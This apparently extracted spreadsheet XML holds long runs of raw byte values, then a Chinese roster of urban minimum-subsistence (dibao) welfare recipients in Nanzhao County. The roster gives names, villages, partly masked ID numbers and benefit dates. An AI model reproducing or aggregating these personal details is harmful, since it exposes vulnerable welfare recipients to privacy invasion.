    <t xml:space="preserve">226 154 170 51 228 91 127 159 46 239 57 154 37 239 170 205 144 139 102 102 200 63 237 202 144 95 125 61 83 254 37 240 255 37 132 249 20 120 119 229 129 60 112 191 188 34 83 206 41 74 151 159 249 143 52 249 98 124 134 220 210 145 33 159 152 152 37 191 147 146 37 231 190 145 37 191 5 105 101 64 62 63 123 97 137 252 220 154 116 249 191 236 153 242 143 33 237 55 64 254 37 73 153 242 67 240 123 183 48 157 148 31 83 196 98 250 220 19 78 182 5 48 109 60 95 12 155 4 254 124 106 248 226 88 125 98 147 213 9 180 141 232 17 162 133 68 29 68 187 136 38 19 189 72 180 148 104 55 209 83 68 15 18 245 18 125 153 104 42 81 51 209 62 162 140 211 241 72 95 163 251 114 162 187 136 14 16 189 71 212 67 52 141 104 22 81 39 209 26 162 183 136 174 35 106 33 110 115 232 254 50 209 60 162 110 162 55 136 246 242 144 68 15 19 189 74 244 1 209 219 68 167 18 157 73 180 149 168 157 104 34 209 179 68 55 19 237 33 218 78 180 159 232 105 162 39 137 46 35 106 229 121 39 217 142 211 125 39 209 125 68 23 19 189 67 244 16 209 6 162 57 68 175 88 241 237 184 91 39 58 89 223 221 160 54 164 67 183 165 113 235 205 132 35 45 47 207 207 62 177 96 153 180 227 191 207 136 159 127 224 155 157 155 141 38 219 132 5 141 5 140 142 30 89 56 15 159 226 70 186 119 146 147 174 169 112 197 208 121 41 156 163 94 239 242 8 248 89 28 78 218 63 106 152 136 225 248 38 212 237 147 201 204 3 238 94 120 142 223 87 113 255 166 108 213 146 199 250 167 167 135 213 165 221 97 174 49 65 11 33 253 83 156 44 49 25 210 235 119 80 130 22 22 218 173 198 95 182 204 4 222 136 189 19 156 172 149 113 35 40 184 81 230 143 210 222 209 180 166 183 158 5 179 169 187 163 143 63 90 190 122 33 77 231 44 39 187 5 153 193 60 173 198 118 0 215 116 250 253 37 183 83 222 2 169 237 132 235 14 182 133 126 125 173 253 170 91 251 109 180 102 169 94 211 239 197 31 245 97 216 6 163 219 253 127 3 88 239 180 189 246 52 </t>
  </si>
  <si>
    <t xml:space="preserve">168 31 175 65 189 209 218 67 42 184 223 219 253 120 203 231 5 62 231 137 77 199 190 243 155 154 247 218 199 208 185 218 38 106 43 122 232 1 183 102 137 7 1 121 46 158 200 121 117 78 226 97 173 14 126 189 2 97 227 180 254 23 191 7 183 241 214 144 95 95 211 236 113 45 208 87 105 150 202 240 59 94 28 80 243 28 11 125 57 70 91 241 252 27 93 147 219 229 241 44 90 72 31 42 75 242 132 149 95 52 72 138 227 34 182 101 74 215 204 174 44 12 201 250 106 15 56 30 233 246 74 106 175 27 251 130 211 87 177 163 186 170 246 50 254 209 83 240 156 87 227 241 208 135 95 224 203 45 199 54 146 97 222 149 200 163 16 226 109 22 188 111 232 121 247 134 120 123 7 241 14 179 27 161 109 111 7 221 8 248 45 177 138 90 38 99 67 219 93 224 159 50 7 255 96 21 191 183 233 45 45 172 14 179 180 192 68 188 193 191 243 102 108 164 118 34 52 158 92 110 254 171 125 110 83 133 231 11 243 18 105 107 1 97 28 99 131 194 159 222 122 241 228 119 215 78 177 190 213 202 190 199 178 150 189 133 111 254 133 87 58 139 221 101 43 217 220 130 125 59 206 183 222 216 145 190 237 251 237 203 220 73 149 41 37 146 67 43 59 252 136 141 163 254 39 155 187 154 210 158 229 79 39 149 174 160 116 240 157 242 120 220 31 253 144 111 175 235 215 30 238 19 153 2 231 139 54 147 180 189 241 202 202 29 91 170 138 93 213 57 46 180 189 90 237 13 250 173 108 220 57 200 175 172 170 177 196 229 5 42 220 104 87 24 42 116 181 238 121 105 147 55 247 5 157 59 167 185 129 223 175 110 116 161 113 225 32 175 188 70 87 83 179 199 155 237 118 85 63 175 247 135 123 52 204 174 221 99 98 116 191 14 143 204 115 109 207 174 242 120 244 242 232 188 215 213 232 252 243 235 169 169 4 221 208 130 10 240 235 68 100 126 87 214 53 213 234 203 1 221 165 245 27 234 106 53 63 16 134 155 75 70 59 230 141 193 112 16 162 180 94 68 230 225 188 141 217 85 222 208 125 125 195 206 32 95 204 59 149 154 206 13 97 214 213 54 133 202 118 141 171 14 </t>
  </si>
  <si>
    <t xml:space="preserve">219 161 107 21 157 147 200 19 211 158 173 93 28 42 115 136 23 150 183 13 91 48 130 62 159 107 235 106 189 97 233 134 165 35 210 102 58 185 33 72 89 149 39 84 86 193 124 64 29 8 150 63 220 135 229 105 125 93 80 70 173 79 197 241 89 187 239 156 18 49 23 21 254 87 116 240 17 128 222 189 33 112 103 239 157 100 55 14 231 53 175 82 103 84 227 127 2 175 47 222 105 135 94 180 164 236 89 191 235 206 165 220 126 43 4 88 116 211 95 113 207 95 49 224 175 232 241 87 92 244 87 156 242 87 116 249 43 142 251 43 14 158 193 169 208 162 110 229 156 23 146 252 228 251 254 163 13 112 245 31 245 16 117 19 45 39 154 71 52 139 104 26 209 84 162 22 162 3 15 145 246 17 189 65 244 50 209 139 68 59 137 30 6 74 201 41 231 90 31 98 98 178 73 181 225 108 47 176 4 103 144 129 229 56 215 252 232 31 240 116 5 27 78 98 11 21 31 10 80 168 218 112 50 27 232 15 140 83 58 144 95 113 153 90 52 245 230 7 190 238 111 37 201 83 221 87 82 157 172 12 194 224 228 119 81 247 222 115 24 98 73 82 71 247 103 55 2 253 138 130 12 84 27 78 143 183 250 62 77 218 55 23 186 222 211 102 38 181 249 125 14 120 112 6 181 123 252 10 101 199 231 68 170 96 6 47 249 240 5 204 156 236 100 151 124 152 49 236 175 149 14 188 83 20 44 134 192 52 154 123 95 115 247 66 218 110 243 100 77 118 245 221 192 85 69 193 2 228 57 82 175 23 186 19 39 163 191 223 183 153 248 150 139 57 159 66 105 22 41 29 152 92 177 226 67 174 133 242 98 69 193 0 69 170 13 103 245 126 223 213 135 24 7 11 50 142 36 192 59 37 255 56 228 7 30 243 132 84 27 78 175 149 142 52 206 7 217 21 114 33 129 57 50 43 150 205 170 13 39 226 123 47 38 243 124 225 216 194 243 133 70 194 149 220 227 16 1 93 144 44 46 44 182 250 186 147 246 161 198 137 204 100 21 144 245 93 27 192 226 193 114 85 109 184 52 224 101 172 38 249 126 194 134 87 154 253 15 121 105 254 4 179 238 255 17 214 18 165 163 47 88 156 </t>
  </si>
  <si>
    <t xml:space="preserve">234 53 46 88 22 4 241 255 136 138 89 20 118 57 61 141 154 59 121 129 200 31 47 44 197 151 198 31 102 241 172 231 241 24 229 84 174 161 18 80 109 184 130 114 207 130 233 240 71 254 81 161 138 70 245 164 72 84 52 107 161 90 156 167 175 58 139 110 10 78 170 13 151 40 242 12 33 131 106 59 196 157 92 64 238 228 121 57 61 73 95 121 74 100 85 188 99 81 212 226 197 171 182 78 94 207 133 240 169 156 43 247 228 217 83 124 13 60 229 227 92 80 11 15 130 75 40 165 3 29 197 110 180 165 173 218 22 83 149 193 55 163 16 45 84 242 187 32 224 157 65 85 197 194 217 166 242 36 203 121 121 69 43 225 81 90 177 77 229 121 50 5 43 14 14 181 129 13 93 197 216 128 79 82 186 253 84 85 251 68 85 245 31 237 37 247 13 17 86 161 88 192 184 143 103 30 253 33 181 195 220 179 147 60 55 244 64 113 224 186 49 48 13 87 146 88 11 119 66 92 40 93 173 236 177 116 3 185 93 190 110 239 138 173 123 179 76 205 79 43 249 61 144 67 92 137 6 242 187 158 90 153 236 247 157 5 86 75 87 90 27 147 84 219 102 238 29 32 63 37 217 135 61 163 191 99 51 56 62 22 79 161 81 130 11 194 248 126 230 93 182 117 239 211 166 230 12 37 183 167 48 156 99 183 224 152 40 56 146 135 146 200 217 41 155 144 93 162 198 14 93 212 106 76 238 238 73 88 212 81 222 32 138 84 148 24 224 73 39 74 32 63 174 161 177 223 192 46 87 189 30 184 10 89 12 228 37 198 17 111 168 252 228 15 101 214 64 141 89 82 109 103 233 157 36 138 214 97 75 164 58 215 42 172 17 242 242 89 72 229 51 103 152 185 57 223 43 125 60 42 84 96 32 157 89 42 116 95 158 164 239 208 176 43 11 249 104 162 42 202 46 117 72 33 221 87 33 206 240 88 229 183 1 31 159 135 87 192 6 170 128 33 62 91 47 229 238 195 30 208 203 11 20 135 143 66 55 46 194 85 27 110 83 20 246 5 238 105 189 147 162 180 242 74 70 97 69 160 169 212 69 232 163 221 166 160 135 121 208 78 170 143 84 90 184 27 242 209 158 207 241 69 </t>
  </si>
  <si>
    <t xml:space="preserve">186 111 225 75 228 45 36 48 141 182 76 174 105 239 52 247 32 132 197 253 147 211 15 38 225 171 199 246 113 134 186 55 106 224 151 124 216 0 22 195 240 224 87 176 178 239 189 99 13 244 248 199 4 148 7 56 18 126 205 236 95 101 9 248 204 216 69 174 74 132 218 98 133 128 74 254 193 162 96 151 214 75 217 182 67 207 112 227 97 168 69 6 150 119 106 163 76 254 69 109 20 40 167 225 134 54 104 174 131 204 235 82 131 21 15 203 147 154 142 146 127 170 72 72 219 158 170 181 86 33 109 223 67 109 188 59 78 210 14 232 165 189 163 147 246 222 67 146 22 82 46 226 221 179 214 189 170 239 98 248 43 1 171 127 124 160 208 236 47 50 7 10 45 254 34 75 192 153 232 95 153 40 75 238 147 148 185 83 80 132 180 27 117 13 10 238 6 101 111 142 168 194 215 121 250 103 33 220 105 18 202 23 42 194 171 84 186 88 8 202 134 139 197 193 126 132 15 147 148 112 79 192 2 162 230 153 65 206 64 158 197 255 53 74 120 85 34 151 137 122 26 144 203 119 11 175 43 205 129 14 100 138 210 249 110 147 143 94 192 104 162 233 6 140 143 55 42 29 30 93 131 14 107 139 161 193 66 116 209 74 71 42 15 59 196 184 20 234 96 47 132 87 69 100 109 21 172 7 215 218 252 30 237 125 99 53 0 114 10 73 87 145 12 1 178 40 192 113 244 56 8 36 172 17 224 70 226 133 64 254 237 26 63 233 250 86 62 183 49 240 97 197 133 131 26 28 3 240 204 10 237 131 237 122 146 13 210 71 210 96 63 60 59 4 120 2 240 117 192 183 1 175 3 254 22 240 30 160 37 141 177 20 192 57 128 78 192 114 64 55 224 14 192 253 128 71 0 95 3 60 11 88 34 177 182 119 224 122 11 240 46 224 0 224 168 217 140 205 0 92 8 232 4 60 6 97 138 225 186 25 208 11 184 27 240 18 248 93 6 60 4 247 39 240 25 220 95 1 60 5 247 151 1 223 3 236 3 252 20 15 104 77 135 181 41 224 76 192 197 128 121 128 223 0 252 87 8 15 235 160 54 55 220 127 19 176 29 240 8 224 247 0 223 6 124 15 240 54 224 61 64 243 </t>
  </si>
  <si>
    <t xml:space="preserve">83 176 86 5 76 5 76 7 92 12 152 243 20 47 143 72 29 170 202 236 181 213 245 180 204 174 172 170 145 43 183 54 120 171 234 88 172 245 86 180 245 142 126 29 66 28 106 106 119 84 110 207 88 28 226 216 232 218 190 96 200 149 24 95 97 69 95 151 13 177 146 141 182 210 12 73 176 104 161 110 197 203 133 30 106 253 171 173 175 98 172 128 117 171 34 253 106 54 44 197 5 25 181 97 50 52 106 94 80 198 77 181 161 82 205 118 63 223 228 125 126 56 235 195 200 117 183 88 55 195 219 244 120 86 55 215 209 249 240 98 225 44 202 186 138 191 190 168 171 89 144 226 133 70 93 14 171 93 13 222 188 170 186 26 143 171 145 133 189 173 200 92 208 203 20 111 188 144 199 195 227 174 163 172 52 195 215 174 225 43 79 146 192 83 191 109 208 123 26 84 106 220 43 230 138 91 191 194 14 139 21 206 185 49 202 238 70 248 186 155 13 185 3 129 59 28 95 176 31 17 109 191 33 123 173 254 29 68 174 174 245 171 124 96 181 189 217 195 227 68 180 58 109 87 131 158 185 90 27 98 174 242 117 187 47 6 24 96 128 1 6 24 96 128 1 6 24 96 128 1 6 24 96 128 1 6 24 96 128 1 127 25 128 191 161 207 162 163 14 233 52 111 86 206 88 27 234 215 57 225 138 159 114 210 132 85 141 80 56 19 233 31 183 197 240 63 60 200 63 142 45 104 198 223 231 179 182 133 112 189 12 215 69 205 100 208 102 80 124 212 1 29 24 36 23 215 239 180 152 162 251 167 198 240 79 139 225 159 5 151 194 149 192 79 2 25 132 142 117 121 54 215 19 215 220 237 217 60 190 230 238 202 97 172 79 23 254 240 26 70 231 159 117 69 156 226 104 161 115 12 203 88 9 171 164 179 96 139 225 110 45 91 207 10 192 141 167 190 174 102 220 152 238 57 243 239 31 134 126 85 192 88 164 253 17 51 27 108 145 36 135 104 25 233 92 106 231 122 173 101 117 116 98 21 194 76 138 85 10 79 209 30 76 147 208 235 228 231 232 32 140 54 119 153 209 238 137 9 100 242 138 147 194 182 69 225 148 67 97 28 108 49 224 211 116 93 69 101 51 135 180 103 </t>
  </si>
  <si>
    <t xml:space="preserve">53 123 209 152 198 78 200 81 21 217 164 65 64 75 100 219 137 43 234 131 78 128 176 92 255 187 134 53 147 174 167 62 108 164 102 56 35 254 168 29 172 201 19 126 14 16 2 234 143 59 132 17 3 7 133 13 231 31 25 35 60 252 56 8 191 86 28 24 211 8 87 212 111 13 73 212 68 86 210 106 232 152 23 70 117 31 45 75 175 167 82 218 70 121 226 250 176 92 182 186 168 241 230 209 81 52 174 224 251 140 99 118 187 68 109 2 107 202 130 102 187 221 74 150 113 176 30 45 108 182 90 185 11 107 217 162 102 180 37 161 153 115 208 172 231 116 199 108 177 162 229 181 181 137 179 86 219 240 22 176 141 117 119 99 44 149 254 81 57 154 46 248 167 210 55 218 33 251 1 75 127 11 82 85 237 111 105 96 73 16 186 191 129 241 43 11 187 82 163 77 106 99 227 122 241 102 220 93 126 233 29 86 95 195 229 0 60 0 237 28 58 155 110 200 125 119 2 96 82 20 220 195 216 37 85 23 71 229 54 55 236 188 111 10 150 83 155 244 213 150 211 159 20 14 168 9 13 122 151 170 38 180 8 15 11 255 164 158 208 194 61 180 79 236 218 243 160 187 129 133 185 67 69 253 85 184 219 219 245 238 144 11 221 232 186 123 87 115 135 187 16 134 114 253 31 131 26 21 206 171 234 3 182 7 26 192 116 24 163 18 0 241 186 103 128 153 212 225 227 10 117 32 78 85 7 86 168 234 125 53 54 132 215 115 83 180 33 66 47 235 16 242 46 219 163 94 120 48 125 96 197 131 132 251 234 131 233 128 123 238 171 159 171 67 227 121 245 254 131 229 234 253 11 231 213 129 101 43 224 250 197 242 14 89 94 221 127 254 242 50 102 113 6 24 96 128 1 6 24 48 124 248 95 253 </t>
  </si>
  <si>
    <t>南召县城镇低保金发放花名册</t>
  </si>
  <si>
    <t>序
号</t>
  </si>
  <si>
    <t>乡镇</t>
  </si>
  <si>
    <t>单位、村</t>
  </si>
  <si>
    <t>姓名</t>
  </si>
  <si>
    <t>身份证号********</t>
  </si>
  <si>
    <t>行政区划</t>
  </si>
  <si>
    <t>家庭
人口</t>
  </si>
  <si>
    <t>人均
月补</t>
  </si>
  <si>
    <t>月领取金额</t>
  </si>
  <si>
    <t>享受时间</t>
  </si>
  <si>
    <t>致困原因</t>
  </si>
  <si>
    <t>0001</t>
  </si>
  <si>
    <t>城关镇</t>
  </si>
  <si>
    <t>东北六组</t>
  </si>
  <si>
    <t>张同强</t>
  </si>
  <si>
    <t>412921********001X</t>
  </si>
  <si>
    <t>4113210103</t>
  </si>
  <si>
    <t>2023年4月前</t>
  </si>
  <si>
    <t>生活困难</t>
  </si>
  <si>
    <t>0002</t>
  </si>
  <si>
    <t>张成霞</t>
  </si>
  <si>
    <t>412921********074X</t>
  </si>
  <si>
    <t>0003</t>
  </si>
  <si>
    <t>中华村</t>
  </si>
  <si>
    <t>石洪文</t>
  </si>
  <si>
    <t>412921********0017</t>
  </si>
  <si>
    <t>4113210108</t>
  </si>
  <si>
    <t>0004</t>
  </si>
  <si>
    <t>王世瑞</t>
  </si>
  <si>
    <t>412921********002X</t>
  </si>
  <si>
    <t>0005</t>
  </si>
  <si>
    <t>贝亚迅</t>
  </si>
  <si>
    <t>412921********0021</t>
  </si>
  <si>
    <t>0006</t>
  </si>
  <si>
    <t>高学升</t>
  </si>
  <si>
    <t>412921********0076</t>
  </si>
  <si>
    <t>0007</t>
  </si>
  <si>
    <t>贺业凤</t>
  </si>
  <si>
    <t>412921********0208</t>
  </si>
  <si>
    <t>0008</t>
  </si>
  <si>
    <t>东北四组</t>
  </si>
  <si>
    <t>刘献兰</t>
  </si>
  <si>
    <t>412921********0022</t>
  </si>
  <si>
    <t>0009</t>
  </si>
  <si>
    <t>随伟</t>
  </si>
  <si>
    <t>412921********006X</t>
  </si>
  <si>
    <t>0010</t>
  </si>
  <si>
    <t>赵清运</t>
  </si>
  <si>
    <t>412921********037X</t>
  </si>
  <si>
    <t>0011</t>
  </si>
  <si>
    <t>魏厚宽</t>
  </si>
  <si>
    <t>412921********0036</t>
  </si>
  <si>
    <t>0012</t>
  </si>
  <si>
    <t>魏承启</t>
  </si>
  <si>
    <t>411321********0015</t>
  </si>
  <si>
    <t>0013</t>
  </si>
  <si>
    <t>西北村</t>
  </si>
  <si>
    <t>闫书强</t>
  </si>
  <si>
    <t>412921********0019</t>
  </si>
  <si>
    <t>4113210106</t>
  </si>
  <si>
    <t>0014</t>
  </si>
  <si>
    <t>曹瑞霞</t>
  </si>
  <si>
    <t>412921********0027</t>
  </si>
  <si>
    <t>0015</t>
  </si>
  <si>
    <t>东北五组</t>
  </si>
  <si>
    <t>王作芳</t>
  </si>
  <si>
    <t>412921********0029</t>
  </si>
  <si>
    <t>0016</t>
  </si>
  <si>
    <t>王学芳</t>
  </si>
  <si>
    <t>412921********0052</t>
  </si>
  <si>
    <t>0017</t>
  </si>
  <si>
    <t>李丰明</t>
  </si>
  <si>
    <t>0018</t>
  </si>
  <si>
    <t>芦元六</t>
  </si>
  <si>
    <t>412921********0030</t>
  </si>
  <si>
    <t>0019</t>
  </si>
  <si>
    <t>梁世代</t>
  </si>
  <si>
    <t>412921********0018</t>
  </si>
  <si>
    <t>0020</t>
  </si>
  <si>
    <t>北外村</t>
  </si>
  <si>
    <t>郭春凤</t>
  </si>
  <si>
    <t>412921********0023</t>
  </si>
  <si>
    <t>4113210102</t>
  </si>
  <si>
    <t>0021</t>
  </si>
  <si>
    <t>黄梅兰</t>
  </si>
  <si>
    <t>412921********0020</t>
  </si>
  <si>
    <t>0022</t>
  </si>
  <si>
    <t>冀钦亭</t>
  </si>
  <si>
    <t>412921********0069</t>
  </si>
  <si>
    <t>0023</t>
  </si>
  <si>
    <t>巩心亮</t>
  </si>
  <si>
    <t>412921********0154</t>
  </si>
  <si>
    <t>0024</t>
  </si>
  <si>
    <t>高萍</t>
  </si>
  <si>
    <t>0025</t>
  </si>
  <si>
    <t>廉春梅</t>
  </si>
  <si>
    <t>412921********0028</t>
  </si>
  <si>
    <t>0026</t>
  </si>
  <si>
    <t>葛中原</t>
  </si>
  <si>
    <t>412921********0011</t>
  </si>
  <si>
    <t>0027</t>
  </si>
  <si>
    <t>石兴兰</t>
  </si>
  <si>
    <t>412921********0066</t>
  </si>
  <si>
    <t>0028</t>
  </si>
  <si>
    <t>吉怀东</t>
  </si>
  <si>
    <t>412921********0032</t>
  </si>
  <si>
    <t>0029</t>
  </si>
  <si>
    <t>邵伟</t>
  </si>
  <si>
    <t>0030</t>
  </si>
  <si>
    <t>乔国英</t>
  </si>
  <si>
    <t>0031</t>
  </si>
  <si>
    <t>东北一组</t>
  </si>
  <si>
    <t>王召红</t>
  </si>
  <si>
    <t>412921********0026</t>
  </si>
  <si>
    <t>0032</t>
  </si>
  <si>
    <t>崔书清</t>
  </si>
  <si>
    <t>412921********005X</t>
  </si>
  <si>
    <t>0033</t>
  </si>
  <si>
    <t>石龙秀</t>
  </si>
  <si>
    <t>412921********0081</t>
  </si>
  <si>
    <t>0034</t>
  </si>
  <si>
    <t>张庆发</t>
  </si>
  <si>
    <t>0035</t>
  </si>
  <si>
    <t>张秀昌</t>
  </si>
  <si>
    <t>412921********0016</t>
  </si>
  <si>
    <t>0036</t>
  </si>
  <si>
    <t>黄国珍</t>
  </si>
  <si>
    <t>412921********0042</t>
  </si>
  <si>
    <t>0037</t>
  </si>
  <si>
    <t>王天合</t>
  </si>
  <si>
    <t>412921********0034</t>
  </si>
  <si>
    <t>0038</t>
  </si>
  <si>
    <t>贺立敏</t>
  </si>
  <si>
    <t>412921********0024</t>
  </si>
  <si>
    <t>0039</t>
  </si>
  <si>
    <t>王中塑</t>
  </si>
  <si>
    <t>411321********0010</t>
  </si>
  <si>
    <t>0040</t>
  </si>
  <si>
    <t>张德明</t>
  </si>
  <si>
    <t>412921********003X</t>
  </si>
  <si>
    <t>0041</t>
  </si>
  <si>
    <t>张红丽</t>
  </si>
  <si>
    <t>411326********0048</t>
  </si>
  <si>
    <t>0042</t>
  </si>
  <si>
    <t>杨大强</t>
  </si>
  <si>
    <t>0043</t>
  </si>
  <si>
    <t>汤孝全</t>
  </si>
  <si>
    <t>0044</t>
  </si>
  <si>
    <t>贺小伟</t>
  </si>
  <si>
    <t>0045</t>
  </si>
  <si>
    <t>李士军</t>
  </si>
  <si>
    <t>0046</t>
  </si>
  <si>
    <t>耿中香</t>
  </si>
  <si>
    <t>412921********0063</t>
  </si>
  <si>
    <t>0047</t>
  </si>
  <si>
    <t>樊长合</t>
  </si>
  <si>
    <t>0048</t>
  </si>
  <si>
    <t>王金杰</t>
  </si>
  <si>
    <t>0049</t>
  </si>
  <si>
    <t>陈建凡</t>
  </si>
  <si>
    <t>412921********4834</t>
  </si>
  <si>
    <t>0050</t>
  </si>
  <si>
    <t>张国恒</t>
  </si>
  <si>
    <t>412921********0073</t>
  </si>
  <si>
    <t>0051</t>
  </si>
  <si>
    <t>吴凤菊</t>
  </si>
  <si>
    <t>412921********0049</t>
  </si>
  <si>
    <t>0052</t>
  </si>
  <si>
    <t>王兴付</t>
  </si>
  <si>
    <t>0053</t>
  </si>
  <si>
    <t>柯长荣</t>
  </si>
  <si>
    <t>0054</t>
  </si>
  <si>
    <t>李小芳</t>
  </si>
  <si>
    <t>0055</t>
  </si>
  <si>
    <t>张钦溥</t>
  </si>
  <si>
    <t>411323********4312</t>
  </si>
  <si>
    <t>0056</t>
  </si>
  <si>
    <t>邵明超</t>
  </si>
  <si>
    <t>412921********0039</t>
  </si>
  <si>
    <t>0057</t>
  </si>
  <si>
    <t>赵长莲</t>
  </si>
  <si>
    <t>0058</t>
  </si>
  <si>
    <t>熊景元</t>
  </si>
  <si>
    <t>0059</t>
  </si>
  <si>
    <t>王秀枝</t>
  </si>
  <si>
    <t>412921********004X</t>
  </si>
  <si>
    <t>0060</t>
  </si>
  <si>
    <t>靳德全</t>
  </si>
  <si>
    <t>0061</t>
  </si>
  <si>
    <t>钟天丰</t>
  </si>
  <si>
    <t>412921********0126</t>
  </si>
  <si>
    <t>0062</t>
  </si>
  <si>
    <t>梁世隆</t>
  </si>
  <si>
    <t>412921********0031</t>
  </si>
  <si>
    <t>0063</t>
  </si>
  <si>
    <t>陈献芳</t>
  </si>
  <si>
    <t>0064</t>
  </si>
  <si>
    <t>华祖凤</t>
  </si>
  <si>
    <t>412921********0047</t>
  </si>
  <si>
    <t>0065</t>
  </si>
  <si>
    <t>梁士忠</t>
  </si>
  <si>
    <t>412921********0055</t>
  </si>
  <si>
    <t>0066</t>
  </si>
  <si>
    <t>王荣敏</t>
  </si>
  <si>
    <t>412921********0085</t>
  </si>
  <si>
    <t>0067</t>
  </si>
  <si>
    <t>黎金贵</t>
  </si>
  <si>
    <t>412921********5113</t>
  </si>
  <si>
    <t>0068</t>
  </si>
  <si>
    <t>杨金满</t>
  </si>
  <si>
    <t>0069</t>
  </si>
  <si>
    <t>闫雪珍</t>
  </si>
  <si>
    <t>412921********0040</t>
  </si>
  <si>
    <t>0070</t>
  </si>
  <si>
    <t>林青</t>
  </si>
  <si>
    <t>0071</t>
  </si>
  <si>
    <t>郭天华</t>
  </si>
  <si>
    <t>0072</t>
  </si>
  <si>
    <t>刘成华</t>
  </si>
  <si>
    <t>0073</t>
  </si>
  <si>
    <t>蔺运梅</t>
  </si>
  <si>
    <t>412921********1546</t>
  </si>
  <si>
    <t>0074</t>
  </si>
  <si>
    <t>王玉芝</t>
  </si>
  <si>
    <t>0075</t>
  </si>
  <si>
    <t>代欣震</t>
  </si>
  <si>
    <t>0076</t>
  </si>
  <si>
    <t>李长生</t>
  </si>
  <si>
    <t>412921********0013</t>
  </si>
  <si>
    <t>0077</t>
  </si>
  <si>
    <t>赵芝兰</t>
  </si>
  <si>
    <t>412921********0041</t>
  </si>
  <si>
    <t>0078</t>
  </si>
  <si>
    <t>谷秀荣</t>
  </si>
  <si>
    <t>0079</t>
  </si>
  <si>
    <t>范永梅</t>
  </si>
  <si>
    <t>0080</t>
  </si>
  <si>
    <t>李山仁</t>
  </si>
  <si>
    <t>412921********5535</t>
  </si>
  <si>
    <t>0081</t>
  </si>
  <si>
    <t>孔相珍</t>
  </si>
  <si>
    <t>412921********5529</t>
  </si>
  <si>
    <t>0082</t>
  </si>
  <si>
    <t>曹会荣</t>
  </si>
  <si>
    <t>412921********0127</t>
  </si>
  <si>
    <t>0083</t>
  </si>
  <si>
    <t>李广丰</t>
  </si>
  <si>
    <t>0084</t>
  </si>
  <si>
    <t>王东兴</t>
  </si>
  <si>
    <t>412921********0077</t>
  </si>
  <si>
    <t>0085</t>
  </si>
  <si>
    <t>彭中华</t>
  </si>
  <si>
    <t>412921********0121</t>
  </si>
  <si>
    <t>0086</t>
  </si>
  <si>
    <t>张金丰</t>
  </si>
  <si>
    <t>0087</t>
  </si>
  <si>
    <t>党金箱</t>
  </si>
  <si>
    <t>0088</t>
  </si>
  <si>
    <t>李世林</t>
  </si>
  <si>
    <t>0089</t>
  </si>
  <si>
    <t>凌根发</t>
  </si>
  <si>
    <t>0090</t>
  </si>
  <si>
    <t>楚德献</t>
  </si>
  <si>
    <t>0091</t>
  </si>
  <si>
    <t>王功会</t>
  </si>
  <si>
    <t>412921********4823</t>
  </si>
  <si>
    <t>0092</t>
  </si>
  <si>
    <t>孙庆阁</t>
  </si>
  <si>
    <t>0093</t>
  </si>
  <si>
    <t>薛世华</t>
  </si>
  <si>
    <t>0094</t>
  </si>
  <si>
    <t>胡铖赟</t>
  </si>
  <si>
    <t>411321********0072</t>
  </si>
  <si>
    <t>0095</t>
  </si>
  <si>
    <t>铁俊生</t>
  </si>
  <si>
    <t>0096</t>
  </si>
  <si>
    <t>李小元</t>
  </si>
  <si>
    <t>412921********0012</t>
  </si>
  <si>
    <t>0097</t>
  </si>
  <si>
    <t>郭凤凤</t>
  </si>
  <si>
    <t>0098</t>
  </si>
  <si>
    <t>曹会生</t>
  </si>
  <si>
    <t>0099</t>
  </si>
  <si>
    <t>王天娥</t>
  </si>
  <si>
    <t>412921********0083</t>
  </si>
  <si>
    <t>0100</t>
  </si>
  <si>
    <t>张国杰</t>
  </si>
  <si>
    <t>0101</t>
  </si>
  <si>
    <t>曾祥峰</t>
  </si>
  <si>
    <t>412921********4011</t>
  </si>
  <si>
    <t>0102</t>
  </si>
  <si>
    <t>李太贵</t>
  </si>
  <si>
    <t>412921********0054</t>
  </si>
  <si>
    <t>0103</t>
  </si>
  <si>
    <t>谷晓华</t>
  </si>
  <si>
    <t>412921********0044</t>
  </si>
  <si>
    <t>0104</t>
  </si>
  <si>
    <t>张文琴</t>
  </si>
  <si>
    <t>412921********014X</t>
  </si>
  <si>
    <t>0105</t>
  </si>
  <si>
    <t>东北村</t>
  </si>
  <si>
    <t>丁振生</t>
  </si>
  <si>
    <t>0106</t>
  </si>
  <si>
    <t>杜明显</t>
  </si>
  <si>
    <t>412921********4031</t>
  </si>
  <si>
    <t>0107</t>
  </si>
  <si>
    <t>李太伟</t>
  </si>
  <si>
    <t>412921********4839</t>
  </si>
  <si>
    <t>0108</t>
  </si>
  <si>
    <t xml:space="preserve">王德环 </t>
  </si>
  <si>
    <t>412921********0424</t>
  </si>
  <si>
    <t>0109</t>
  </si>
  <si>
    <t>张金太</t>
  </si>
  <si>
    <t>412921********3310</t>
  </si>
  <si>
    <t>0110</t>
  </si>
  <si>
    <t>郭春香</t>
  </si>
  <si>
    <t>0111</t>
  </si>
  <si>
    <t>赵长玲</t>
  </si>
  <si>
    <t>0112</t>
  </si>
  <si>
    <t>李士清</t>
  </si>
  <si>
    <t>412921********0046</t>
  </si>
  <si>
    <t>0113</t>
  </si>
  <si>
    <t>陈士良</t>
  </si>
  <si>
    <t>0114</t>
  </si>
  <si>
    <t>余贵海</t>
  </si>
  <si>
    <t>412921********0057</t>
  </si>
  <si>
    <t>2024年7月前</t>
  </si>
  <si>
    <t>0115</t>
  </si>
  <si>
    <t>张成立</t>
  </si>
  <si>
    <t>0116</t>
  </si>
  <si>
    <t>郭清焕</t>
  </si>
  <si>
    <t>0117</t>
  </si>
  <si>
    <t>周庆雷</t>
  </si>
  <si>
    <t>0118</t>
  </si>
  <si>
    <t>席清兰</t>
  </si>
  <si>
    <t>0119</t>
  </si>
  <si>
    <t>闫玉华</t>
  </si>
  <si>
    <t>0120</t>
  </si>
  <si>
    <t>赵国生</t>
  </si>
  <si>
    <t>0121</t>
  </si>
  <si>
    <t>王春芝</t>
  </si>
  <si>
    <t>412921********0025</t>
  </si>
  <si>
    <t>0122</t>
  </si>
  <si>
    <t>赵阳</t>
  </si>
  <si>
    <t>411326********0011</t>
  </si>
  <si>
    <t>0123</t>
  </si>
  <si>
    <t>潘兴焕</t>
  </si>
  <si>
    <t>0124</t>
  </si>
  <si>
    <t>杨玉芝</t>
  </si>
  <si>
    <t>0125</t>
  </si>
  <si>
    <t>赵双</t>
  </si>
  <si>
    <t>0126</t>
  </si>
  <si>
    <t>宋少润</t>
  </si>
  <si>
    <t>412921********0061</t>
  </si>
  <si>
    <t>0127</t>
  </si>
  <si>
    <t>石玲玲</t>
  </si>
  <si>
    <t>0128</t>
  </si>
  <si>
    <t>赵海武</t>
  </si>
  <si>
    <t>0129</t>
  </si>
  <si>
    <t>栗芳</t>
  </si>
  <si>
    <t>0130</t>
  </si>
